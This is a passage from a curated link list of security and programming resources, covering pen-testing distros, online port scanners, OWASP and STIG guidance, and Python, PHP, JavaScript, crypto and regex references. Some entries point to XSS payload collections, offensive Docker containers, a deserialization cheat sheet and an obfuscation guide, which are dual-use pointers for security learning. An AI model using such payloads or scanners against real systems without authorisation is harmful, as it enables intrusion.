private Burp Collaborator Server in Azure. By Javier Olmedo, Jun 17, 2019 [https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70](https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70) * and Chrome's internal URLs for problem solving [chrome://chrome-urls/](chrome://chrome-urls/) * DNS research [https://github.com/ogham/dog](https://github.com/ogham/dog) * HTTPie, a user-friendly command-line HTTP client for the API era [https://httpie.io/](https://httpie.io/) * nmap tutorial [https://github.com/gnebbia/nmap_tutorial](https://github.com/gnebbia/nmap_tutorial) * Using custom nmap port sets [https://bsago.me/tech-notes/custom-nmap-port-sets](https://bsago.me/tech-notes/custom-nmap-port-sets) * Scanners Box [also known as scanbox] is a sizable, categorized collection of *scanners* from across GitHub.com [https://github.com/We5ter/Scanners-Box](https://github.com/We5ter/Scanners-Box) * Very simple Python-based recon [https://github.com/naltun/eyes.py](https://github.com/naltun/eyes.py) * Damn Small JS Scanner (DSJS) is a JavaScript library vulnerability scanner [https://github.com/stamparm/DSJS](https://github.com/stamparm/DSJS) * Awk/gawk manual [https://www.gnu.org/software/gawk/manual/gawk.pdf](https://www.gnu.org/software/gawk/manual/gawk.pdf) * Airbus security lab publications [https://airbus-seclab.github.io/](https://airbus-seclab.github.io/) and their tools at [https://github.com/airbus-seclab/](https://github.com/airbus-seclab/) * Run your own VPN(s) [https://github.com/trailofbits/algo](https://github.com/trailofbits/algo) * "8 Best VPNs in 2021: Tested All Apps, Speed, Security & More." by Chase Williams September 01, 2021 [https://www.wizcase.com/vpn-reviews/](https://www.wizcase.com/vpn-reviews/) * Email address parser from website list [https://github.com/skeitel/Python-Programs-and-Exercises-by-Javier-Marti/blob/master/email_parser_from_website_list.py](https://github.com/skeitel/Python-Programs-and-Exercises-by-Javier-Marti/blob/master/email_parser_from_website_list.py) * Detect secrets within a code base [https://github.com/Yelp/detect-secrets](https://github.com/Yelp/detect-secrets) * Python script to check HTTP security headers [https://github.com/juerkkil/securityheaders](https://github.com/juerkkil/securityheaders) * sslyze [https://github.com/iSECPartners/sslyze](https://github.com/iSECPartners/sslyze) * Sometimes it is important to carefully explore the content of given resources. Here is an excellent, comprehensive Unicode reference [https://jrgraphix.net/research/unicode_blocks.php](https://jrgraphix.net/research/unicode_blocks.php) ### Pen testing Linux distros * BackBox [https://backbox.org/](https://backbox.org/) * Blackarch [https://blackarch.org/](https://blackarch.org/) and [https://github.com/BlackArch/blackarch](https://github.com/BlackArch/blackarch) * DemonLinux [https://demonlinux.com/about.php](hhttps://demonlinux.com/about.php) * Fedora Security Lab [https://labs.fedoraproject.org/en/security/](https://labs.fedoraproject.org/en/security/) * Kali [https://www.kali.org/](https://www.kali.org/) * Network Security Toolkit, NST [http://www.networksecuritytoolkit.org/nst/index.html](http://www.networksecuritytoolkit.org/nst/index.html) * Parrot Security OS [https://www.parrotsec.org/](https://www.parrotsec.org/) * Shell Script to Convert Your Debian Into Parrot OS Pentesting Mach1ne [https://github.com/blackhatethicalhacking/parrotfromdebian](https://github.com/blackhatethicalhacking/parrotfromdebian) * Pentoo [http://www.pentoo.ch/](http://www.pentoo.ch/) * mx-live-usb-maker [https://github.com/MX-Linux/mx-live-usb-maker](https://github.com/MX-Linux/mx-live-usb-maker) and [https://github.com/MX-Linux/lum-qt-appimage/releases](https://github.com/MX-Linux/lum-qt-appimage/releases) * and some Security-oriented Docker containers [https://github.com/khast3x/Offensive-Dockerfiles](https://github.com/khast3x/Offensive-Dockerfiles) * and a cloud-enabled approach to the same idea, RedCloud [https://github.com/khast3x/Redcloud](https://github.com/khast3x/Redcloud) * and if you need a little Linux help [https://gto76.github.io/linux-cheatsheet/](https://gto76.github.io/linux-cheatsheet/) and [https://github.com/gto76/linux-cheatsheet](https://github.com/gto76/linux-cheatsheet) ### BPF Tools** Explore your Live Linux Kernel Image - Berkeley Packet Filters & eBPF * BPF Compiler Collection (BCC) - Tools for BPF-based Linux IO analysis, networking, monitoring, and more [https://github.com/iovisor/bcc](https://github.com/iovisor/bcc) ### Online Scanners * yougetsignal [http://www.yougetsignal.com/tools/open-ports/](http://www.yougetsignal.com/tools/open-ports/) * Reverse IP Domain Check [https://www.yougetsignal.com/tools/web-sites-on-web-server/](https://www.yougetsignal.com/tools/web-sites-on-web-server/) * Network Location Check [https://www.yougetsignal.com/tools/network-location/](https://www.yougetsignal.com/tools/network-location/) * viewdns [a range of dns tools] [https://viewdns.info/](https://viewdns.info/) * hackertarget [https://hackertarget.com/nmap-online-port-scanner/](https://hackertarget.com/nmap-online-port-scanner/) * Dump links from a page [https://hackertarget.com/extract-links/](https://hackertarget.com/extract-links/) * And a range of related tools [https://hackertarget.com/ip-tools/](https://hackertarget.com/ip-tools/) * ipfingerprints [http://www.ipfingerprints.com/portscan.php](http://www.ipfingerprints.com/portscan.php) * pingeu [http://ping.eu/port-chk/](http://ping.eu/port-chk/) * spiderip [https://spiderip.com/online-port-scan.php](https://spiderip.com/online-port-scan.php) * t1shopper [http://www.t1shopper.com/tools/port-scan/](http://www.t1shopper.com/tools/port-scan/) * Whois Ping Port Scanner NSlookup & Traceroute @ t1shopper [http://www.t1shopper.com/tools/](http://www.t1shopper.com/tools/) * standingtech [https://portscanner.standingtech.com/](https://portscanner.standingtech.com/) * Convert IP Address to Binary, Hexadecimal, Octal, and Long Integer [https://ipaddress.standingtech.com/online-ip-address-converter](https://ipaddress.standingtech.com/online-ip-address-converter) * Or use a Python-based command-line utility for using websites that can perform port scans on your behalf [https://github.com/vesche/scanless](https://github.com/vesche/scanless) ### Markdown * [https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) * [https://docs.github.com/en/get-started/writing-on-github](https://docs.github.com/en/get-started/writing-on-github) * [https://bitbucket.org/tutorials/markdowndemo](https://bitbucket.org/tutorials/markdowndemo) * Markdown Cheatsheet [http://commonmark.org/help/](http://commonmark.org/help/) * [https://guides.github.com/pdfs/markdown-cheatsheet-online.pdf](https://guides.github.com/pdfs/markdown-cheatsheet-online.pdf) * GitHub Flavored Markdown Spec [https://github.github.com/gfm/](https://github.github.com/gfm/) * Another GitHub Flavored Markdown cheatsheet [https://github.com/tchapi/markdown-cheatsheet](https://github.com/tchapi/markdown-cheatsheet) * Collection of static site generators [https://jamstack.org/generators/](https://jamstack.org/generators/) and [https://staticsitegenerators.net/](https://staticsitegenerators.net/) ### JavaScript * Very basic [http://marijnhaverbeke.nl/js-cheatsheet.html](http://marijnhaverbeke.nl/js-cheatsheet.html) * [http://www.cheatography.com/acwinter/cheat-sheets/javascript-basic-advanced-and-more/](http://www.cheatography.com/acwinter/cheat-sheets/javascript-basic-advanced-and-more/) and * [http://www.cheatography.com/tag/javascript/](http://www.cheatography.com/tag/javascript/) and * [http://www.sitepoint.com/10-javascript-cheat-sheets/](http://www.sitepoint.com/10-javascript-cheat-sheets/) * Learning JavaScript Design Patterns. Volume 1.6.2, By Addy Osmani [https://addyosmani.com/resources/essentialjsdesignpatterns/book/](https://addyosmani.com/resources/essentialjsdesignpatterns/book/) * Programming JavaScript Applications. By Eric Elliott [http://chimera.labs.oreilly.com/books/1234000000262/index.html](http://chimera.labs.oreilly.com/books/1234000000262/index.html) * Cheatsheets for experienced React developers getting started with TypeScript [https://github.com/typescript-cheatsheets/react-typescript-cheatsheet](https://github.com/typescript-cheatsheets/react-typescript-cheatsheet) * Node: Up and Running. By Tom Hughes-Croucher and Mike Wilson [http://chimera.labs.oreilly.com/books/1234000001808/index.html](http://chimera.labs.oreilly.com/books/1234000001808/index.html) * Narrative workbook -- This is a companion workbook that will assist you in working through the codeX Narrative that is to be provided. Resources and references provided that will assist you in your journey will be published in the repository. [https://github.com/codex-academy/codeX_ReleaseOneNarrativeWorkbook](https://github.com/codex-academy/codeX_ReleaseOneNarrativeWorkbook) * "Don't make fun of JavaScript" [https://github.com/pixari/dmfojs](https://github.com/pixari/dmfojs) ### General Secure Programming * Fortify Taxonomy of Secure Software Errors. [https://vulncat.fortify.com/en](https://vulncat.fortify.com/en) * Awesome App-Sec. A curated list of resources for learning about application security. [https://github.com/paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) * Static analysis tools for *all* programming languages [https://github.com/analysis-tools-dev/static-analysis](https://github.com/analysis-tools-dev/static-analysis) * Awesome Static Analysis - a collection of static analysis tools and code quality checkers. [https://github.com/mre/awesome-static-analysis](https://github.com/mre/awesome-static-analysis) * Python Taint -- pyt -- A Static Analysis Tool for Detecting common Security Vulnerabilities in Python Web Applications [https://github.com/python-security/pyt](https://github.com/python-security/pyt) * Bandit -- A security linter for detecting common security vulnerabilities in Python applications [https://github.com/PyCQA/bandit](https://github.com/PyCQA/bandit) * Clair is an open source project for the static analysis of vulnerabilities in application containers (currently including OCI and docker) [https://github.com/quay/clair](https://github.com/quay/clair) * Awesome CI {Continuation Integration}, Incl. tools for git, file and static source code security analysis - [https://github.com/cytopia/awesome-ci](https://github.com/cytopia/awesome-ci) * "Avoiding the Top 10 Security Flaws." Design guidance by the IEEE Center for Secure Design (CSD), [http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html](http://cybersecurity.ieee.org/center-for-secure-design/avoiding-the-top-10-security-flaws.html) * The IEEE Computer Society Center for Secure Design. [http://cybersecurity.ieee.org/center-for-secure-design.html](http://cybersecurity.ieee.org/center-for-secure-design.html) * The OWASP Application Security Verification Standard (ASVS) Project attempts to provide a basis for testing web application technical security controls. [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project](https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project) * OWASP Cheat Sheet Series -- a collection of high value information on specific web application security topics [https://www.owasp.org/index.php/Cheat_Sheets](https://www.owasp.org/index.php/Cheat_Sheets) and [https://cheatsheetseries.owasp.org/](https://cheatsheetseries.owasp.org/) * Or if just getting the code to work first is your issue: [https://github.com/Neklaustares-tPtwP/Resources/tree/main/Cheat%20Sheets](https://github.com/Neklaustares-tPtwP/Resources/tree/main/Cheat%20Sheets) * Collection of OWASP Web Application Security Testing Cheat Sheets [https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet) * Web Application Security Guide/Checklist [https://en.wikibooks.org/wiki/Web_Application_Security_Guide/Checklist](https://en.wikibooks.org/wiki/Web_Application_Security_Guide/Checklist) * CSRN Security Checklist for Software Developers [https://security.web.cern.ch/security/recommendations/en/checklist_for_coders.shtml](https://security.web.cern.ch/security/recommendations/en/checklist_for_coders.shtml) * Web Application Security Guide [https://en.wikibooks.org/wiki/Web_Application_Security_Guide](https://en.wikibooks.org/wiki/Web_Application_Security_Guide) * DISA Information Assurance Support Environment [https://public.cyber.mil/](https://public.cyber.mil/) * Security Technical Implementation Guides (STIGs) [https://public.cyber.mil/stigs/](https://public.cyber.mil/stigs/) * Application Security STIGs [hhttps://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=app-security](https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=app-security) * Application Security and Development Security Technical Implementation Guide, Version 5, Release 1 - 26 October 2020 [https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_ASD_V5R1_STIG.zip](https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_ASD_V5R1_STIG.zip) * DoD Cloud Computing Security [https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=cloud-security-stigs](https://public.cyber.mil/stigs/downloads/?_dl_facet_stigs=cloud-security-stigs) * IASE Application Security [https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_ASD_V5R1_STIG.zip](https://dl.dod.cyber.mil/wp-content/uploads/stigs/zip/U_ASD_V5R1_STIG.zip) * Excellent STIG viewer [https://www.stigviewer.com/stigs](https://www.stigviewer.com/stigs) * Equally excellent Common Controls viewer [https://www.unifiedcompliance.com/products/search-controls/](https://www.unifiedcompliance.com/products/search-controls/) * DOD Instruction 8500.2 Full Control List [https://www.stigviewer.com/controls/8500](https://www.stigviewer.com/controls/8500) * NIST 800-53 Controls Veiwer [https://www.stigviewer.com/controls/800-53](https://www.stigviewer.com/controls/800-53) * Unified Compliance Hub for navigating the ever-evolving rats nest of public and private mandates [https://www.unifiedcompliance.com/products/](https://www.unifiedcompliance.com/products/) * [http://www.cheatography.com/tag/programming/](http://www.cheatography.com/tag/programming/) * PortSwigger's Cross-site scripting (XSS) cheat sheet [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) * A small collection of XSS-Payloads [https://github.com/terjanq/Tiny-XSS-Payloads](https://github.com/terjanq/Tiny-XSS-Payloads) * XSS-Payloads [https://github.com/RenwaX23/XSS-Payloads](https://github.com/RenwaX23/XSS-Payloads) * Awesome XSS [https://github.com/s0md3v/AwesomeXSS](https://github.com/s0md3v/AwesomeXSS) * XSS Prevention Cheat Sheet from OWASP: [https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) * Fortify Taxonomy of Secure Software Errors. [https://vulncat.fortify.com/en](https://vulncat.fortify.com/en) * Java Deserialization Cheat Sheet [https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet) * The Offensive 360 Knowledge base [https://knowledge-base.offensive360.com/](https://knowledge-base.offensive360.com/) * HTTP Status Codes on-line [https://httpstatuses.com/](https://httpstatuses.com/) * HTTP Status Codes local [https://github.com/mychris/scripts/blob/master/httpstatus](https://github.com/mychris/scripts/blob/master/httpstatus) * IANA Hypertext Transfer Protocol (HTTP) Status Code Registry [http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml](http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml) * Sometimes it is just important to get started: "Hello world in every computer language." [https://github.com/leachim6/hello-world](https://github.com/leachim6/hello-world) * And a 'free' temporary platform may also be important: "A list of SaaS, PaaS and IaaS offerings that have free tiers of interest to devops and infradev." [https://github.com/haneefmubarak/free-for-dev](https://github.com/haneefmubarak/free-for-dev) * Collection of the most common vulnerabilities found in iOS applications [https://github.com/felixgr/secure-ios-app-dev](https://github.com/felixgr/secure-ios-app-dev) * Application logging guidance [https://github.com/mccright/references/blob/master/AppSec-Logging.md](https://github.com/mccright/references/blob/master/AppSec-Logging.md) * AWS logging guidance [https://betterdev.blog/aws-lambda-logging-best-practices/](https://betterdev.blog/aws-lambda-logging-best-practices/) * One approach to logging in your shell scripts [https://www.cubicrace.com/2016/03/efficient-logging-mechnism-in-shell.html](https://www.cubicrace.com/2016/03/efficient-logging-mechnism-in-shell.html) * The TIOBE Index of programming language popularity [https://www.tiobe.com/tiobe-index/](https://www.tiobe.com/tiobe-index/) * A collection of ready-to-deploy-in-AWS Serverless Framework services [https://github.com/serverless/examples](https://github.com/serverless/examples) * A useful script to help manage Java installation and removal on your Linux host [https://github.com/chrishantha/install-java](https://github.com/chrishantha/install-java) * An edge case: *Protecting* your scripts - PowerShell, Visual Basic (VB), and C# code obfuscation -- "A Beginner's Guide to Obfuscation" [https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation) * Attack-resistant programming requires a threshold understanding of your current language. ```esolang-box``` is an "easy and standardized docker images for 200+ esoteric (and non-esoteric) languages." https://github.com/hakatashi/esolang-box ### PHP * Awesome PHP. A curated list of PHP libraries, resources and shiny things. [https://github.com/ziadoz/awesome-php](https://github.com/ziadoz/awesome-php) * [http://www.cheatography.com/tag/php/](http://www.cheatography.com/tag/php/) * PHP Security Guide, 2005. [http://phpsec.org/projects/guide/](http://phpsec.org/projects/guide/) * Survive The Deep End: PHP Security, 2015. [https://phpsecurity.readthedocs.org/en/latest/](https://phpsecurity.readthedocs.org/en/latest/) * Hacking with PHP -> Securty Concerns. [http://www.hackingwithphp.com/17/0/0/security-concerns](http://www.hackingwithphp.com/17/0/0/security-concerns) * PHP The Right Way -> Security. [http://www.phptherightway.com/#security](http://www.phptherightway.com/#security) * PHP Best Practices -- A short, practical guide for common and confusing PHP tasks: [https://phpbestpractices.org/](https://phpbestpractices.org/) ### Python * "The Complete Python Development Guide." [https://testdriven.io/guides/complete-python/](https://testdriven.io/guides/complete-python/) * Hitchhiker's Guide to Python [https://github.com/realpython/python-guide](https://github.com/realpython/python-guide) * and its 'Web Applications & Frameworks' section [https://github.com/realpython/python-guide/blob/master/docs/scenarios/web.rst](https://github.com/realpython/python-guide/blob/master/docs/scenarios/web.rst) * Python Cheatsheet, comprehensive [https://gto76.github.io/python-cheatsheet/](https://gto76.github.io/python-cheatsheet/) and [https://github.com/gto76/python-cheatsheet](https://github.com/gto76/python-cheatsheet) * Python Cheatsheet [https://cheatsheets.quantecon.org/python-cheatsheet.html](https://cheatsheets.quantecon.org/python-cheatsheet.html) * another Python CheatSheet - my current favorite [https://perso.limsi.fr/pointal/_media/python:cours:mementopython3-english.pdf](https://perso.limsi.fr/pointal/_media/python:cours:mementopython3-english.pdf) * A small collection of Python cheatsheets [https://github.com/Neklaustares-tPtwP/Resources/tree/main/Cheat%20Sheets/Python%20%26%20All%20Libraries%20Cheat%20Sheets](https://github.com/Neklaustares-tPtwP/Resources/tree/main/Cheat%20Sheets/Python%20%26%20All%20Libraries%20Cheat%20Sheets) * Python Cheatsheet from kickstartcoding [https://github.com/kickstartcoding/cheatsheets/blob/master/build/topical/python.pdf](https://github.com/kickstartcoding/cheatsheets/blob/master/build/topical/python.pdf) * A neat set of PDF topical Python cheatsheets by the author of ["Python Crash Course" by Eric Matthes](https://www.amazon.com/Python-Crash-Course-2nd-Edition/dp/1593279280/ref=sr_1_2?crid=EWAWN9O4URJY&dchild=1&keywords=python+crash+course+2nd+edition+by+eric+matthes&qid=1608398592&sprefix=%22python+crash+course%22%2Caps%2C200&sr=8-2) [http://ehmatthes.github.io/pcc/cheatsheets/README.html](http://ehmatthes.github.io/pcc/cheatsheets/README.html) and another version for the 2nd edition of PCC at [https://ehmatthes.github.io/pcc_2e/cheat_sheets/cheat_sheets/](https://ehmatthes.github.io/pcc_2e/cheat_sheets/cheat_sheets/) * The standard Python resources: * Main website: https://www.python.org/ * Documentation: https://docs.python.org/ * Developer resources: https://devguide.python.org/ * Downloads: https://www.python.org/downloads/ * Module repository: https://pypi.org/ * 73 Examples to Help You Master Python's f-strings [https://miguendes.me/73-examples-to-help-you-master-pythons-f-strings](https://miguendes.me/73-examples-to-help-you-master-pythons-f-strings) * Docker Official Python Images [https://hub.docker.com/_/python](https://hub.docker.com/_/python) * A deep dive into the official Docker image for Python [https://pythonspeed.com/articles/official-python-docker-image/](https://pythonspeed.com/articles/official-python-docker-image/) * The best Docker base image for your Python application (April 2020) *tl;dr; Ubuntu LTS or Docker Official Python Debian* [https://pythonspeed.com/articles/base-image-python-docker-images/](https://pythonspeed.com/articles/base-image-python-docker-images/) * "Docker Best Practices for Python Developers" By Amal Shaji 2021-10-05 [https://testdriven.io/blog/docker-best-practices/](https://testdriven.io/blog/docker-best-practices/) * "Don't leak your Docker image's build secrets." By Itamar Turner-Trauring, 2021-10-01 [https://pythonspeed.com/articles/docker-build-secrets/](https://pythonspeed.com/articles/docker-build-secrets/) * **unblob** parses unknown binary blobs for more than 30 different archive, compression, and file-system formats, extracts their content recursively, and carves out unknown chunks that have not been accounted for -- just what is needed to explore docker images: [https://github.com/onekey-sec/unblob](https://github.com/onekey-sec/unblob) * PyFormat Using % and .format() [https://pyformat.info/](https://pyformat.info/) * Python's strftime directives [https://strftime.org/](https://strftime.org/) * Python's Pathlib explained [https://rednafi.github.io/digressions/python/2020/04/13/python-pathlib.html](https://rednafi.github.io/digressions/python/2020/04/13/python-pathlib.html) * Type hints cheat sheet (Python 3) [https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html](https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html) * Write Pythonic Code Like a Seasoned Developer Course [https://training.talkpython.fm/courses/explore_pythonic_code/write-pythonic-code-like-a-seasoned-developer](https://training.talkpython.fm/courses/explore_pythonic_code/write-pythonic-code-like-a-seasoned-developer) and [https://github.com/mikeckennedy/write-pythonic-code-demos](https://github.com/mikeckennedy/write-pythonic-code-demos) * 71 Python Code Snippets for Everyday Problems [https://therenegadecoder.com/code/python-code-snippets-for-everyday-problems/#checking-if-a-file-exists](https://therenegadecoder.com/code/python-code-snippets-for-everyday-problems/#checking-if-a-file-exists) * 30-seconds-of-python - Curated collection of useful Python snippets that you can understand in 30 seconds or less [https://github.com/30-seconds/30-seconds-of-python](https://github.com/30-seconds/30-seconds-of-python) * Packaging Projects with Python [https://github.com/russomi/packaging_tutorial](https://github.com/russomi/packaging_tutorial) and [https://packaging.python.org/tutorials/packaging-projects/](https://packaging.python.org/tutorials/packaging-projects/) * MATLAB–Python–Julia cheatsheet [https://cheatsheets.quantecon.org/](https://cheatsheets.quantecon.org/) * Awesome Python -- A curated list of awesome Python frameworks, libraries and software. Inspired by awesome-php. [https://github.com/vinta/awesome-python](https://github.com/vinta/awesome-python) * Best-of Web Development with Python, curated & ranked list [https://github.com/ml-tooling/best-of-web-python](https://github.com/ml-tooling/best-of-web-python) * Awesome Python Security [https://github.com/guardrailsio/awesome-python-security](https://github.com/guardrailsio/awesome-python-security) * Awesome Flask [https://github.com/mjhea0/awesome-flask](https://github.com/mjhea0/awesome-flask) * Python Docker image with poetry as dependency manager. [https://github.com/etienne-napoleone/docker-python-poetry](https://github.com/etienne-napoleone/docker-python-poetry) * Pythonic Data Structures and Algorithms [https://github.com/keon/algorithms](https://github.com/keon/algorithms) * Like the safety of with statements, just not in your code? Let 'just' take care of it [https://github.com/kootenpv/just](https://github.com/kootenpv/just) * Error-handling examples: [https://github.com/ianozsvald/python_exception_examples/blob/master/examples.py](https://github.com/ianozsvald/python_exception_examples/blob/master/examples.py) * Datetime examples: [https://github.com/ianozsvald/datetime-examples/blob/master/examples.py](https://github.com/ianozsvald/datetime-examples/blob/master/examples.py) * Scientific Python Cheatsheet [https://ipgp.github.io/scientific_python_cheat_sheet/](https://ipgp.github.io/scientific_python_cheat_sheet/) * "10 Useful Python Data Visualization Libraries for Any Discipline" by Melissa Bierly [https://blog.modeanalytics.com/python-data-visualization-libraries/](https://blog.modeanalytics.com/python-data-visualization-libraries/) * Counting things in Python [http://treyhunner.com/2015/11/counting-things-in-python/](http://treyhunner.com/2015/11/counting-things-in-python/) * Crypto101: an introductory course on cryptography. [https://www.crypto101.io/](https://www.crypto101.io/) * The Data Scientist's Toolbox [https://www.coursera.org/learn/data-scientists-tools](https://www.coursera.org/learn/data-scientists-tools) * Compiler-free Python crypto library [https://github.com/wbond/oscrypto](https://github.com/wbond/oscrypto) * Python library to convert Microsoft Outlook .msg files to .eml/MIME message files [https://github.com/JoshData/convert-outlook-msg-file](https://github.com/JoshData/convert-outlook-msg-file) * Understanding iteration in Python [https://github.com/wyounas/python_training_hq/tree/master/blog_iterator_code_samples](https://github.com/wyounas/python_training_hq/tree/master/blog_iterator_code_samples) * Virtualenv [https://virtualenv.pypa.io/en/latest/installation.html](https://virtualenv.pypa.io/en/latest/installation.html) and a how-to [https://www.youtube.com/watch?v=N5vscPTWKOk](https://www.youtube.com/watch?v=N5vscPTWKOk) Along with related/supporting projects: * virtualenvwrapper - a useful set of scripts for creating and deleting virtual environments [https://pypi.org/project/virtualenvwrapper](https://pypi.org/project/virtualenvwrapper) * pew: provides a set of commands to manage multiple virtual environments [https://pypi.org/project/pew](https://pypi.org/project/pew) * tox: a generic virtualenv management and test automation command line tool, driven by a tox.ini configuration file [https://pypi.org/project/tox](https://pypi.org/project/tox) * nox: a tool that automates testing in multiple Python environments, similar to tox, driven by a noxfile.py configuration file [https://pypi.org/project/nox](https://pypi.org/project/nox) * And a how-to [https://www.youtube.com/watch?v=N5vscPTWKOk](https://www.youtube.com/watch?v=N5vscPTWKOk) * How to write good quality Python code with GitHub Actions. By Wojciech Krzywiec [https://medium.com/@wkrzywiec/how-to-write-good-quality-python-code-with-github-actions-2f635a2ab09a](https://medium.com/@wkrzywiec/how-to-write-good-quality-python-code-with-github-actions-2f635a2ab09a) * Automating Every Aspect of Your Python Project [https://martinheinz.dev/blog/17](https://martinheinz.dev/blog/17) * An open-source chart and map framework for realtime data [https://github.com/pubnub/eon](https://github.com/pubnub/eon) * Datagen - create sample delimited data using a simple schema format so you can get to work [https://github.com/toddwilson/datagen](https://github.com/toddwilson/datagen) * An asynchronous tasks library using asyncio [https://github.com/joegasewicz/pytask-io](https://github.com/joegasewicz/pytask-io) * Render local readme files before sending off to GitHub [https://github.com/joeyespo/grip](https://github.com/joeyespo/grip) and a sample Python script to generate bulk documentation [https://gist.github.com/mrexmelle/659abc02ae1295d60647](https://gist.github.com/mrexmelle/659abc02ae1295d60647) * A general purpose Python automatization library with real-time web UI [https://github.com/tuomas2/automate](https://github.com/tuomas2/automate) * tmux session manager [https://github.com/tmux-python/tmuxp](https://github.com/tmux-python/tmuxp) * web.py is a web framework for Python that is as simple as it is powerful. [https://github.com/webpy/webpy](https://github.com/webpy/webpy) * Need to upgrade ad-hoc calls to Requests with a client-side API for your apps? [https://github.com/prkumar/uplink](https://github.com/prkumar/uplink) * A basic spreadsheet to api engine [https://github.com/18F/autoapi](https://github.com/18F/autoapi) * Blog with git [https://github.com/joeyespo/gitpress](https://github.com/joeyespo/gitpress) * deadlinks - link checker [https://github.com/butuzov/deadlinks](https://github.com/butuzov/deadlinks) * A rough RSS/Atom feed parser [https://github.com/dcramer/feedreader](https://github.com/dcramer/feedreader) pyautogit [https://github.com/jwlodek/pyautogit](https://github.com/jwlodek/pyautogit) * Library of 60+ commonly-used validator functions [https://github.com/insightindustry/validator-collection](https://github.com/insightindustry/validator-collection) * A python library for parsing multiple types of config files, envvars & command line arguments [https://github.com/naorlivne/parse_it](https://github.com/naorlivne/parse_it) * Some examples of how to use the Python module ‘configparser‘ [https://github.com/revfran/pythonConfigParsing](https://github.com/revfran/pythonConfigParsing), [https://github.com/VakinduPhilliam/Python_Configuration_Parser](https://github.com/VakinduPhilliam/Python_Configuration_Parser) * Search for strings in source code - at scale [https://github.com/s0md3v/hardcodes](https://github.com/s0md3v/hardcodes) * Present data in tables on your terminal [https://github.com/Robpol86/terminaltables](https://github.com/Robpol86/terminaltables) * Another tool for presenting data in tables [https://github.com/jazzband/prettytable](https://github.com/jazzband/prettytable) * Progress bar [https://github.com/verigak/progress](https://github.com/verigak/progress) * present: A terminal-based presentation tool with colors and effects. [https://github.com/vinayak-mehta/present](https://github.com/vinayak-mehta/present) * Color your script output with [https://github.com/gvalkov/python-ansimarkup](https://github.com/gvalkov/python-ansimarkup) or on Windows with [https://pypi.python.org/pypi/colorama](https://pypi.python.org/pypi/colorama) * Colorpedia - a command-line tool for looking up colors, shades and palettes [https://github.com/joowani/colorpedia](https://github.com/joowani/colorpedia) * "Python requests is slow and takes very long to complete HTTP or HTTPS request" -- This is fantastic troubleshooting guidance and advice! [https://stackoverflow.com/questions/62599036/python-requests-is-slow-and-takes-very-long-to-complete-http-or-https-request](https://stackoverflow.com/questions/62599036/python-requests-is-slow-and-takes-very-long-to-complete-http-or-https-request) * "Building a Full Stack Application with Flask and HTMx" [https://codecapsules.io/docs/tutorials/build-flask-htmx-app/](https://codecapsules.io/docs/tutorials/build-flask-htmx-app/) and [https://github.com/codecapsules-io/demo-flask-htmx](https://github.com/codecapsules-io/demo-flask-htmx) * Generate *random* user agent strings * [https://pypi.org/project/random-user-agent/](https://pypi.org/project/random-user-agent/) * [https://pypi.org/project/requests-random-user-agent/](https://pypi.org/project/requests-random-user-agent/) * [https://pypi.org/project/fake_user_agent/](https://pypi.org/project/fake_user_agent/) * [https://pypi.org/project/uas/](https://pypi.org/project/uas/) ### Crypto * Matthew Green's List of Crypto Resources: [http://blog.cryptographyengineering.com/](http://blog.cryptographyengineering.com/) * Crypto101: an introductory course on cryptography. [https://www.crypto101.io/](https://www.crypto101.io/) * Compiler-free Python crypto library [https://github.com/wbond/oscrypto](https://github.com/wbond/oscrypto) * The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis [https://gchq.github.io/CyberChef](https://gchq.github.io/CyberChef) and [https://github.com/gchq/CyberChef](https://github.com/gchq/CyberChef) * **[RFC 9180 Hybrid public-key encryption (HPKE)](https://datatracker.ietf.org/doc/html/rfc9180)** See a useful overview from CloudFlare: [https://blog.cloudflare.com/hybrid-public-key-encryption/](https://blog.cloudflare.com/hybrid-public-key-encryption/). * "[TL;DR - Hybrid Public Key Encryption.](https://www.franziskuskiefer.de/p/tldr-hybrid-public-key-encryption/)" * "[Hybrid Public Key Encryption: My Involvement in Development and Analysis of a Cryptographic Standard](https://www.benjaminlipp.de/p/hpke-cryptographic-standard/)." * And a Python implementation of *[draft version 1](https://datatracker.ietf.org/doc/html/draft-barnes-cfrg-hpke-01)* at: [https://github.com/dwd/crypto-examples/blob/master/hpke.py](https://github.com/dwd/crypto-examples/blob/master/hpke.py). ### Regex * Test your regex on line: [https://regex101.com/](https://regex101.com/) * Test your JavaScript style regex: [https://regexper.com/](https://regexper.com/) * OWASP Validation Regex Repository [https://www.owasp.org/index.php/OWASP_Validation_Regex_Repository](https://www.owasp.org/index.php/OWASP_Validation_Regex_Repository) * A really big collection of regex resources [http://regexlib.com/](http://regexlib.com/) * [http://www.cheatography.com/davechild/cheat-sheets/regular-expressions/](http://www.cheatography.com/davechild/cheat-sheets/regular-expressions/) and * [http://www.cheatography.com/tag/regex/](http://www.cheatography.com/tag/regex/) 